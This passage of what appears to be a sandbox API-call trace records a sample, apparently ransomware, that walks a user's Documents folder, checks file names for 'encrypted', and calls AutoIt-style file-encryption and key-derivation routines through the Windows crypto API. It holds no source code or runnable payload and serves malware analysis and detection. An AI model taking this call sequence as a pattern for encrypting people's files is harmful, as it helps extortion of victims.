lpString1="ts\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="IQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="iAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="AINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="INSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="SrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="D\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="07meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="eSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="So66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="6\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.692] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="EQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Qt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ro_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="o_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Rj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="j3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="wgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gQZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QZq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Zq\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Shrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hrw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rw\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="w\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="OY9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Y9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="9QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="QR-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.693] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="E1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="TerUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="erUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rUi8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ui8X.pdf\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0034.694] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.694] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0034.694] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0034.694] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="df", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.694] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".pdf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.694] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.694] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.694] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.694] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0034.694] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.694] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\OY9QR-E1TerUi8X.pdf", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f3cdfa0, ftCreationTime.dwHighDateTime=0x1d5bc03, ftLastAccessTime.dwLowDateTime=0xc3020f10, ftLastAccessTime.dwHighDateTime=0x1d5b8ae, ftLastWriteTime.dwLowDateTime=0xc3020f10, ftLastWriteTime.dwHighDateTime=0x1d5b8ae, nFileSizeHigh=0x0, nFileSizeLow=0x796e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="OY9QR-E1TerUi8X.pdf", cAlternateFileName="OY9QR-~1.PDF")) returned 0x7c2240 [0034.694] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0034.694] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.694] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.695] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0034.695] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.695] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.695] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.695] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0034.695] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.695] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0034.696] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.696] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.696] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0034.696] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.696] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.696] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.696] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.697] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.697] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0034.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.697] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.697] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.697] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.697] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.697] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.697] PeekMessageW (in: 